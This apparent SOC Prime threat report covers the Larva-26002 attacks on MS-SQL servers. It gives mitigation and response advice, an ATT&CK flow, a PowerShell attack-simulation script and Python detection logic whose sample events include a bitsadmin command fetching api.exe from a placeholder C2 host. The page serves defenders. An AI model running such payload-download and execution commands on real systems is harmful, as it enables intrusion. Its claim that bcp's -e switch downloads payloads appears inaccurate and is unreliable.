SOC Prime Bias: High

27 Mar 2026 16:20

Malware Attack Targeting MS‑SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002)

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The Larva-26002 threat actor repeatedly targets exposed MS-SQL servers through brute-force attacks. Once access is obtained, the attacker uses tools such as BCP, Curl, or Bitsadmin to download and write a Go-based scanner known as ICE Cloud Client. This scanner connects to a command-and-control server, receives credentials for additional SQL servers, and can ultimately facilitate deployment of ransomware families such as Trigona or Mimic.

Investigation

AhnLab documented abuse of the BCP utility to extract a malicious binary from a database table and save it as C:\ProgramData\api.exe. The researchers also observed alternative download methods using Curl and Bitsadmin. The ICE Cloud Launcher then authenticates to its C2 server, retrieves target lists and credentials, and begins brute-forcing other SQL servers. The campaign also introduced remote access tools such as AnyDesk and Teramind.

Mitigation

Organizations should require strong, unique passwords for SQL accounts, avoid exposing SQL services to the internet, and tightly restrict RDP access. SQL Server and related components should be fully patched, while security teams monitor for unusual use of BCP, Curl, or Bitsadmin. Network segmentation and intrusion detection should also be used to identify suspicious outbound communication to known malicious infrastructure.

Response

If this activity is detected, isolate the affected host, preserve forensic artifacts such as api.exe and command history, and search the environment for similar BCP or downloader behavior. Block the malicious IPs and domains, reset compromised SQL credentials, and remove any deployed remote administration tools. A full incident response review should then determine whether ransomware staging or deployment has occurred.

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef tool fill:#ffcc99
        classDef technique fill:#cccccc
        classDef malware fill:#ff9999
        classDef operator fill:#ff9900

        %% Nodes
        action_initial_access["<b>Action</b> – <b>T1110.003 Brute Force: Password Spraying</b><br/>Attacker brute forces exposed MS-SQL services to obtain credentials."]
        class action_initial_access action
        tool_mssql["<b>Tool</b> – <b>Name</b>: Microsoft SQL Server<br/><b>Purpose</b>: Target service for credential theft"]
        class tool_mssql tool
        tech_valid_accounts["<b>Technique</b> – <b>T1078 Valid Accounts</b><br/>Use of obtained credentials to log into SQL servers"]
        class tech_valid_accounts technique
        tech_cmd_shell["<b>Technique</b> – <b>T1059.003 Windows Command Shell</b><br/>Execute system commands (hostname, whoami, ifconfig, netstat, tasklist)"]
        class tech_cmd_shell technique
        tech_network_config["<b>Technique</b> – <b>T1016 System Network Configuration Discovery</b>"]
        class tech_network_config technique
        tech_network_conn["<b>Technique</b> – <b>T1049 System Network Connections Discovery</b>"]
        class tech_network_conn technique
        tech_process_disc["<b>Technique</b> – <b>T1057 Process Discovery</b>"]
        class tech_process_disc technique
        tool_curl["<b>Tool</b> – <b>Name</b>: curl<br/><b>Purpose</b>: Download malicious payload"]
        class tool_curl tool
        tool_bitsadmin["<b>Tool</b> – <b>Name</b>: bitsadmin<br/><b>Purpose</b>: Download malicious payload"]
        class tool_bitsadmin tool
        tool_bcp["<b>Tool</b> – <b>Name</b>: BCP (Bulk Copy Program)<br/><b>Purpose</b>: Export binary data to create api.exe"]
        class tool_bcp tool
        tech_masquerade["<b>Technique</b> – <b>T1036.003 Masquerading: Rename System Utilities</b><br/>Payload disguised as a legitimate program"]
        class tech_masquerade technique
        malware_api["<b>Malware</b> – <b>Name</b>: api.exe<br/><b>Function</b>: ICE Cloud Launcher C2 agent"]
        class malware_api malware
        tech_c2_web["<b>Technique</b> – <b>T1071.001 Web Protocols</b><br/>C2 communication over HTTP"]
        class tech_c2_web technique
        tech_c2_websvc["<b>Technique</b> – <b>T1102.002 Web Service: Dead Drop Resolver</b>"]
        class tech_c2_websvc technique
        action_lateral_movement["<b>Action</b> – <b>T1078 Valid Accounts</b><br/>Use credentials to authenticate to additional MSSQL servers"]
        class action_lateral_movement action
        tech_exploit_remote["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/>Port forwarding or RDP for lateral movement"]
        class tech_exploit_remote technique
        tool_anydesk["<b>Tool</b> – <b>Name</b>: AnyDesk<br/><b>Purpose</b>: Remote control"]
        class tool_anydesk tool
        tool_teramind["<b>Tool</b> – <b>Name</b>: Teramind<br/><b>Purpose</b>: Remote monitoring"]
        class tool_teramind tool
        action_data_exfil["<b>Action</b> – <b>Data Collection & Exfiltration</b><br/>Scanning and exfiltration of configuration data"]
        class action_data_exfil action

        %% Connections
        action_initial_access -->|targets| tool_mssql
        tool_mssql -->|enables| tech_valid_accounts
        tech_valid_accounts -->|allows| tech_cmd_shell
        tech_cmd_shell -->|gathers| tech_network_config
        tech_cmd_shell -->|gathers| tech_network_conn
        tech_cmd_shell -->|gathers| tech_process_disc
        tech_cmd_shell -->|downloads payload using| tool_curl
        tech_cmd_shell -->|downloads payload using| tool_bitsadmin
        tech_cmd_shell -->|uses| tool_bcp
        tool_bcp -->|creates| malware_api
        malware_api -->|masquerades as| tech_masquerade
        malware_api -->|communicates via| tech_c2_web
        malware_api -->|uses| tech_c2_websvc
        malware_api -->|enables| action_lateral_movement
        action_lateral_movement -->|leverages| tech_exploit_remote
        tech_exploit_remote -->|installs| tool_anydesk
        tech_exploit_remote -->|installs| tool_teramind
        tool_anydesk -->|facilitates| action_data_exfil
        tool_teramind -->|facilitates| action_data_exfil

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Reconnaissance on the compromised SQL host – The attacker enumerates host identity and active network interfaces using hostname and netstat -an.
    2. Lateral‑movement preparation – The attacker lists running processes to verify that sqlservr.exe is present, confirming the target is a SQL server.
    3. Malware download via native utility – Using bcp.exe, the attacker abuses the utility’s ability to invoke an external program (-e switch) to download a malicious payload (api.exe) from a remote C2 server.
    4. Execution of the payload – The downloaded api.exe is launched, establishing persistence.
  • Regression Test Script: (PowerShell – fully self‑contained)

    # ------------------------------------------------------------
    # Simulated attack against a Windows SQL Server host
    # ------------------------------------------------------------
    $tempDir = "$env:TEMP\larva26002"
    New-Item -Path $tempDir -ItemType Directory -Force | Out-Null

    # 1. System information gathering (triggers selection_info)
    hostname
    whoami
    netstat -an
    tasklist /FI "IMAGENAME eq sqlservr.exe" /FO CSV /NH

    # 2. Download malicious payload using BCP (triggers selection_malware)
    # Simulate a remote file by creating a dummy exe locally
    $maliciousExe = "$tempDir\api.exe"
    Set-Content -Path $maliciousExe -Value "FakeMalware" -Encoding ASCII

    # BCP command that references "api.exe" via the -e switch, producing the bcp.exe + api.exe command line the rule keys on
    $bcpCmd = @"
    bcp "SELECT TOP (1) name FROM master.dbo.spt_values" queryout NUL -c -t, -S localhost -T -e "$maliciousExe"
    "@
    Invoke-Expression $bcpCmd

    # 3. Execute the payload (additional observable process)
    Start-Process -FilePath $maliciousExe -WindowStyle Hidden

    # Cleanup delay (allow SIEM to ingest)
    Start-Sleep -Seconds 10
  • Cleanup Commands:

    # Remove temporary files and stop any lingering fake process
    Stop-Process -Name "api" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMP\larva26002" -Recurse -Force
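The simulation above is meant to produce two kinds of telemetry: discovery commands (selection_info) and a native tool (bcp, curl, bitsadmin) dropping api.exe (selection_malware). The following Python is an added example of that detection logic run over process-creation events; it is not SOC Prime's rule, AhnLab's code or the campaign's tooling, and every host name, path, event and the [C2-PLACEHOLDER] URL is constructed for the example.

```python
import re
from collections import defaultdict
# Constructed sample events (Sysmon Event ID 1 style), not real telemetry; [C2-PLACEHOLDER] stands in for infrastructure the page does not name.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
BCP = r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe"
SAMPLE_EVENTS = [
    {"host": "sql01", "parent": SQLSERVR, "image": CMD, "cmdline": "cmd.exe /c hostname"},
    {"host": "sql01", "parent": CMD, "image": r"C:\Windows\System32\netstat.exe", "cmdline": "netstat -an"},
    {"host": "sql01", "parent": CMD, "image": BCP,
     "cmdline": r'bcp "SELECT bin FROM tempdb.dbo.t" queryout C:\ProgramData\api.exe -T -f C:\ProgramData\f.fmt'},
    {"host": "sql01", "parent": CMD, "image": r"C:\ProgramData\api.exe", "cmdline": "api.exe"},
    {"host": "sql02", "parent": CMD, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job http://[C2-PLACEHOLDER]/api.exe C:\ProgramData\api.exe"},
    {"host": "dev03", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\curl.exe", "cmdline": "curl -O https://example.invalid/readme.txt"},
    {"host": "dw01", "parent": CMD, "image": BCP, "cmdline": r"bcp Sales.dbo.Orders out C:\exports\orders.csv -c -T"},
]

RECON = {"hostname", "whoami", "netstat", "tasklist", "ipconfig"}
DOWNLOADERS = {"bcp.exe", "curl.exe", "bitsadmin.exe"}
# An executable written under ProgramData, or anything named api.exe (the campaign's payload name)
PAYLOAD_WRITE = re.compile(r'\\ProgramData\\[^\s"]*\.exe|\bapi\.exe', re.I)

def classify(ev):
    """Return the rule selections one event satisfies (empty list if none)."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    tokens = set(re.findall(r"[a-z]+", ev["cmdline"].lower()))
    hits = []
    # selection_info: host, network and process discovery, as the image name or as a cmd.exe /c argument
    if image.removesuffix(".exe") in RECON or tokens & RECON:
        hits.append("selection_info")
    # selection_malware: a native downloader/export tool dropping the payload
    if image in DOWNLOADERS and PAYLOAD_WRITE.search(ev["cmdline"]):
        hits.append("selection_malware")
    # selection_payload: the dropped binary itself starting from ProgramData
    if image == "api.exe" and "\\programdata\\" in ev["image"].lower():
        hits.append("selection_payload")
    return hits

def detect(events):
    """Aggregate the selections seen per host; hosts with no hits are dropped."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(classify(ev))
    return {h: sorted(s) for h, s in per_host.items() if s}

def flagged_hosts(events):
    # Page on the payload drop itself; discovery commands alone are too common to alert on
    return sorted(h for h, s in detect(events).items() if "selection_malware" in s)
```

Routine bcp exports to non-executable paths (dw01) and ordinary curl downloads (dev03) fall through, which keeps the rule usable on hosts where these tools are part of daily administration.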